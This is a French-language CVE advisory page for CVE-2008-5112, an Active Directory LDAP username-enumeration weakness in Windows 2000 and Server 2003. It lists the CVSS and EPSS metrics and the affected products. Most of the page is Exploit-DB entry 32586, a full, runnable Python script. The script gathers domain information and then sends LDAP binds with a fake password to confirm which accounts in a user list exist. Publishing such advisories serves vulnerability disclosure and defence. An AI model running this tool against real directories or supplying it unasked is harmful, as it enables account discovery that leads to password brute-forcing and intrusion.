CVE-2008-5112
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 32586
Date de publication : 2008-11-13 23h00 +00:00
Auteur : Bernardo Damele
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/32305/info
Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
This issue affects Active Directory on these versions of Windows:
Windows 2000 SP4
Windows Server 2003 SP1 and SP2
Other versions may also be affected.
#!/usr/bin/env python
'''
Microsoft Windows Active Directory LDAP Server Information
Disclosure Vulnerability Exploit
(c) 2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
License: GPLv2
Version: 0.1
References:
* http://labs.portcullis.co.uk/application/ldapuserenum/
* http://www.portcullis-security.com/40.php
Successfully tested on:
* Microsoft 2000 Server Service Pack 4 + Update Rollup 1 Full Patched at
October 2008
* Microsoft 2003 Standard Service Pack 2 Full Patched at October 2008
'''
import os
import re
import sys
import traceback
try:
import ldap
except:
print 'ERROR: this tool requires python-ldap library to be installed, get it '
print 'from http://python-ldap.sourceforge.net/ or apt-get install python-ldap'
sys.exit(1)
from optparse import OptionError
from optparse import OptionParser
def LDAPconnect(target, port=389, version=ldap.VERSION3):
try:
# Connect to the remote LDAP server
l = ldap.open(target, port)
# Set the LDAP protocol version
l.protocol_version = version
except:
print 'ERROR: unable to connect to the remote LDAP server'
return l
def LDAPinfo(target, info=False):
# Connect to the remote LDAP server
l = LDAPconnect(target)
# Retrieved machine domain
domain = None
# Set search requirements and directory
baseDN = ''
searchScope = ldap.SCOPE_BASE
resultSet = []
# Retrieve all LDAP attributes
retrieveAttributes = None
searchFilter = 'objectClass=*'
try:
# Get LDAP information
ldapResultId = l.search(baseDN, searchScope, searchFilter, retrieveAttributes)
except ldap.SERVER_DOWN, _:
print 'ERROR: unable to connect to the remote LDAP server'
return domain
while True:
resultType, resultData = l.result(ldapResultId, 0)
if not resultData:
break
elif resultType == ldap.RES_SEARCH_ENTRY:
resultSet.append(resultData)
results = resultSet[0][0][1]
if results:
if info:
print '\n[*] LDAP information:'
else:
print 'Unable to perform LDAP information gathering, probably anonymous LDAP bind is forbidden'
domain = raw_input('Please, provide the machine domain yourself: ')
return domain
# Print LDAP information
for key, values in results.items():
if info:
print '\t[*] %s' % key
for value in values:
if info:
print '\t\t[*] %s' % value
domainRegExp = re.search('DC=([\w\.]+)', value, re.I)
if domainRegExp:
domain = domainRegExp.group(1)
print
return domain
def LDAPusersEnum(target, domain):
# Enumerated users
users = {}
# Path to users list
usersFilePath = './users.txt'
# Active Directory LDAP bind errors
# Source: http://www-01.ibm.com/support/docview.wss?rs=688&uid=swg21290631
errorCodes = {
#'525': 'user not found',
'52e': 'invalid credentials',
'530': 'not permitted to logon at this time',
'531': 'not permitted to logon at this workstation',
'532': 'password expired',
'533': 'account disabled',
'701': 'account expired',
'773': 'user must reset password',
'775': 'user account locked',
}
# Check if users list exists
if not os.path.exists(usersFilePath):
print 'ERROR: users list file %s not found' % usersFilePath
return
print 'Going to enumerate users taking \'%s\' file as input\n' % usersFilePath
# Load users from a text file
fd = open(usersFilePath, 'r')
for user in fd.readlines():
user = user.replace('\n', '').replace('\r', '')
# Skip empty and commented lines
if not user or user[0] == '#':
continue
# Set search requirements and directory
baseDN = '%s@%s' % (user, domain)
password = 'UnexistingPassword'
try:
# Connect and perform an LDAP bind with an invalid password and
# request results
l = LDAPconnect(target)
num = l.bind_s(baseDN, password)
result = l.result(num)
except ldap.SERVER_DOWN, _:
print 'ERROR: unable to connect to the remote LDAP server'
return
except:
# Python LDAP library only handles a number of exception, not
# all of the possible ones so we except globally and parse the
# exception message to distinguish between existing and
# unexisting user
errorMessage = str(traceback.format_exc())
detectedErrorCode = re.search(' data ([\w]+),', errorMessage)
if not detectedErrorCode:
continue
detectedErrorCode = detectedErrorCode.group(1).lower()
if detectedErrorCode in errorCodes.keys():
users[user] = detectedErrorCode
if users:
print '[*] Enumerated users:'
for user, detectedErrorCode in users.items():
print '\t[*] User: %s' % user
print '\t\t[*] LDAP error code: %s' % detectedErrorCode
print '\t\t[*] LDAP message: %s' % errorCodes[detectedErrorCode]
else:
print '[*] No users enumerated'
if __name__ == '__main__':
usage = '%s [-i] -t <target>' % sys.argv[0]
parser = OptionParser(usage=usage, version='0.1')
try:
parser.add_option('-d', dest='descr', action='store_true', help='show description and exit')
parser.add_option('-t', dest='target', help='target IP or hostname')
parser.add_option('-i', '--info', dest='info', action='store_true',
help='show LDAP information gathering results')
(args, _) = parser.parse_args()
if not args.descr and not args.target:
parser.error('Missing the target, -h for help')
except (OptionError, TypeError), e:
parser.error(e)
if args.descr:
print __doc__
sys.exit(0)
domain = LDAPinfo(args.target, args.info)
if domain:
domain = str(domain).upper()
LDAPusersEnum(args.target, domain)
Products Mentioned
Configuraton 0
Microsoft>>Windows >> Version server_2003
Microsoft>>Windows >> Version server_2003
Microsoft>>Windows_2000 >> Version -
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
